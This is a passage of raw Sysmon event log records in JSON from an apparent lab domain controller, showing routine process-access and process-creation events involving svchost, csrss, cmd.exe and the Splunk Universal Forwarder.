05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001000270500}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001000270500}","TargetProcessId":"4260","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.855\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001000270500}\r\nSourceProcessId: 4260\r\nSourceThreadId: 4236\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.855","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001000270500}","SourceProcessId":"4260","SourceThreadId":"4236","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.894\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nProcessId: 4292\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nParentProcessId: 2528\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.894","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010C0290500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010E51F0500}","ParentProcessId":"2528","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nSourceProcessId: 2528\r\nSourceThreadId: 2772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","SourceProcessId":"2528","SourceThreadId":"2772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C0290500}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C0290500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C0290500}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 